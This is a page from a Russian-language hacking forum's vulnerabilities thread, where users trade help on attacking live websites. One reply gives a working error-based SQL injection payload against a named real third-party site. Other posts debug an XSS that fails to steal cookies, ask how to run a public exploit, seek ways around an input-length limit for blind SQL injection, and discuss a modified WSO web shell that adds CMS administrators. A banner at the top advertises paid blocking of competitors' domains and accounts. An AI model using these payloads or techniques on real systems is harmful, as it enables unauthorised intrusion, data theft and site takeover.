УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 249 из 296

249

Опции темы

Поиск в этой теме

Опции просмотра

#2481

04.01.2019, 13:54

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

Цитата:

Сообщение от DezMond™

DezMond™ said:
↑
Помогите раскрутить, странная скуля

Код:

Code:
https://www.hellinger.com/index.php?eID=tx_positioner_eID&data=%257B%2522userFunc%2522%253A%2522tx_positioner_pi1-%253Emain%2522%252C%2522ajaxResultLimit%2522%253A%252250%2522%252C%2522listViewImageHeight%2522%253A%2522100%2522%252C%2522ajaxSearchOrderBy%2522%253A%2522substring_index%2528storename%252C%2B%2527%2B%2527%252C%2B-1%2529%2522%252C%2522_LOCAL_LANG.%2522%253A%257B%2522de.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Aufstellername%2522%257D%252C%2522en.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Name%2Bof%2Bconstellator%2522%257D%252C%2522fr.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Name%2Bof%2Bconstellator%2522%257D%252C%2522it.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Nome%2Bdel%2Bcostellatore%2522%257D%252C%2522es.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Nombre%2Bdel%2Bconstelador%2522%257D%252C%2522br.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Nome%2Bdo%2Bconstelador%2522%257D%252C%2522ru.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522%255Cu0418%255Cu043c%255Cu044f%2B%255Cu0440%255Cu0430%255Cu0441%255Cu0441%255Cu0442%255Cu0430%255Cu043d%255Cu043e%255Cu0432%255Cu0449%255Cu0438%255Cu043a%255Cu0430%2522%257D%257D%252C%2522cosmicPowerEnabled%2522%253Anull%252C%2522templateFile%2522%253A%2522fileadmin%255C%252Fweb%255C%252Ftemplates%255C%252Fviews%255C%252Fpositioner%255C%252Ftemplate.html%2522%252C%2522cssFile%2522%253A%2522fileadmin%255C%252Fweb%255C%252Ftemplates%255C%252Fviews%255C%252Fpositioner%255C%252Flayout.css%2522%252C%2522detailsPageId%2522%253A%25221205%2522%252C%2522seminarDetailsPageId%2522%253A%2522%2522%252C%2522mailFormPageId%2522%253A%2522%2522%252C%2522externalSeminarRegisterPageId%2522%253A%2522%2522%252C%2522memberListItemsPerPage%2522%253A%2522%2522%252C%2522memberContactPageId%2522%253A%2522%2522%252C%2522shopPageId%2522%253A%2522%2522%252C%2522testSystem%2522%253A%25220%2522%252C%2522activityCategories%2522%253A%25221%252C2%252C3%252C4%252C5%252C6%252C50%252C51%252C52%252C53%2522%252C%2522displayMode%2522%253A%2522ajaxSearchForm%2522%252C%2522pid_list%2522%253A%2522447%2522%252C%2522_GP%2522%253A%257B%2522action%2522%253A%2522viewSearchForm%2522%257D%252C%2522lang%2522%253A%2522en%2522%252C%2522pageId%2522%253A%25221204%2522%257D&tx_positioner_pi1%5Baction%5D=search&tx_positioner_pi1%5Bsearch%5D=Germany&tx_positioner_pi1%5Blat%5D=&tx_positioner_pi1%5Blon%5D=&tx_positioner_pi1%5Bradius%5D=50&tx_positioner_pi1%5Bactivities%5D=1&tx_positioner_pi1%5Bqualification%5D=google_HD.png

Код:

Code:
index.php?eID=tx_positioner_eID&data={"userFunc":"tx_positioner_pi1->main","ajaxResultLimit":"50","listViewImageHeight":"100","ajaxSearchOrderBy":"substring_index(storename,+'+',+-1)","_LOCAL_LANG.":{"de.":{"placeholderPositionerName":"Aufstellername"},"en.":{"placeholderPositionerName":"Name+of+constellator"},"fr.":{"placeholderPositionerName":"Name+of+constellator"},"it.":{"placeholderPositionerName":"Nome+del+costellatore"},"es.":{"placeholderPositionerName":"Nombre+del+constelador"},"br.":{"placeholderPositionerName":"Nome+do+constelador"},"ru.":{"placeholderPositionerName":"\u0418\u043c\u044f+\u0440\u0430\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0430"}},"cosmicPowerEnabled":null,"templateFile":"fileadmin\/web\/templates\/views\/positioner\/template.html","cssFile":"fileadmin\/web\/templates\/views\/positioner\/layout.css","detailsPageId":"1205","seminarDetailsPageId":"","mailFormPageId":"","externalSeminarRegisterPageId":"","memberListItemsPerPage":"","memberContactPageId":"","shopPageId":"","testSystem":"0","activityCategories":"1,2,3,4,5,6,50,51,52,53","displayMode":"ajaxSearchForm","pid_list":"447-extractvalue(1,concat(0x0a,(select+version()+from+tx_locator_locations+limit+1)))","_GP":{"action":"viewSearchForm"},"lang":"en","pageId":"1204"}&tx_positioner_pi1[action]=search&tx_positioner_pi1[search]=Germany&tx_positioner_pi1[lat]=&tx_positioner_pi1[lon]=&tx_positioner_pi1[radius]=50&tx_positioner_pi1[activities]=1&tx_positioner_pi1[qualification]=google_HD.png

#2482

04.01.2019, 19:37

I love this game

Познающий

Регистрация: 23.12.2008

Сообщений: 81

Провел на форуме:
460763

Репутация: 97

Отправить сообщение для I love this game с помощью ICQ

Есть активная xss, alert работает, но вот document.cookie никак не хочет показывать, в чем может быть проблема?

#2483

04.01.2019, 20:07

st55

Guest

Сообщений: n/a

Провел на форуме:
52834

Репутация: 47

Цитата:

Сообщение от I love this game

I love this game said:
↑
Есть активная xss, alert работает, но вот document.cookie никак не хочет показывать, в чем может быть проблема?

Куки с флагом HttpOnly.

#2484

06.01.2019, 06:22

izpodvbipodverta

Guest

Сообщений: n/a

Провел на форуме:
754

Репутация: 0

Подскажите как заюзать exploit https://www.exploit-db.com/exploits/39838

Спасибо...

#2485

06.01.2019, 12:38

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

Цитата:

Сообщение от izpodvbipodverta

izpodvbipodverta said:
↑
Подскажите как заюзать exploit
https://www.exploit-db.com/exploits/39838
Спасибо...

Запусти его и там вылезет описание, как правильно его запустить и что для этого нужно! Внизу даже есть скриншот "подсказка".

#2486

08.01.2019, 11:28

izpodvbipodverta

Guest

Сообщений: n/a

Провел на форуме:
754

Репутация: 0

Цитата:

Сообщение от cat1vo

cat1vo said:
↑
Запусти его и там вылезет описание, как правильно его запустить и что для этого нужно! Внизу даже есть скриншот "подсказка".

Спасибо

#2487

30.01.2019, 12:48

hibar1Xs

Guest

Сообщений: n/a

Провел на форуме:
3935

Репутация: 3

SQL.

Как обойти ограничение введённого значения в 64 символа? Отсутствует вывод на страницу.

Есть имя таблицы и столбца.

Длина нужных столбцов: 13 и 10.

Длина таблицы: 9.

Код:

Code:
'union select user_password from pref_user where user_id='1

Union подходит, без вывода.

Error-based не подходит под ограничение. Только вывод функций.

Фильтр '
.SpoilerTarget" type="button">Spoiler

[PHP]
PHP:
[COLOR="#000000"]$dataInput=$_POST['email'];

$email_check=import_data($dataInput,'TEXT',64);// 64 длина символов.

functionimport_data($dataInput,$filter,$maxlen=0){
$v=$dataInput;
if ($maxlen>0)
{$v=substr($v,0,$maxlen); }

if($filter==='TEXT') {
$v=trim($v);
if (strpos($v,[COLOR="#DD0000"]'

Сам запрос в бд:

.SpoilerTarget" type="button">Spoiler

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]
$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql_func_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT COUNT(*) FROM[/COLOR][COLOR="#0000BB"]$dbUsers[/COLOR][COLOR="#DD0000"]WHERE email='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]data_format[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$email_check[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql_func_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"COUNT(*)"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]// ...

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]sql_func_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
   return[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]; }

function[/COLOR][COLOR="#0000BB"]sql_func_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$col[/COLOR][COLOR="#007700"]){
   return ([/COLOR][COLOR="#0000BB"]mysql_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$col[/COLOR][COLOR="#007700"])); }
[/COLOR][/COLOR]

#2488

01.02.2019, 06:45

Kirza

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 0

Всем привет. Кто знает этот шел? - можете что подсказать по функционалу ? =

#2489

01.02.2019, 08:04

Sensoft

Guest

Сообщений: n/a

Провел на форуме:
104689

Репутация: 1

Цитата:

Сообщение от Kirza

Kirza said:
↑
Всем привет. Кто знает этот шел? - можете что подсказать по функционалу ? =

Функционал написан, похож на WSO

#2490

01.02.2019, 12:25

karkajoi

Guest

Сообщений: n/a

Провел на форуме:
96779

Репутация: 5

Цитата:

Сообщение от Sensoft

Sensoft said:
↑
Функционал написан, похож на WSO

Это модифицированый WSO инфа 100(юзал его когда-то), из интересного в нем есть добавление админов для разных популярных CMS(WP,Joomla,Drupal)кто-то недавно искал такие скрипты, функционал работал не весь это точно помню, а так все в принципе что в нем есть на скрине видно. Модификация вроде делалась какой-то арабской группировкой.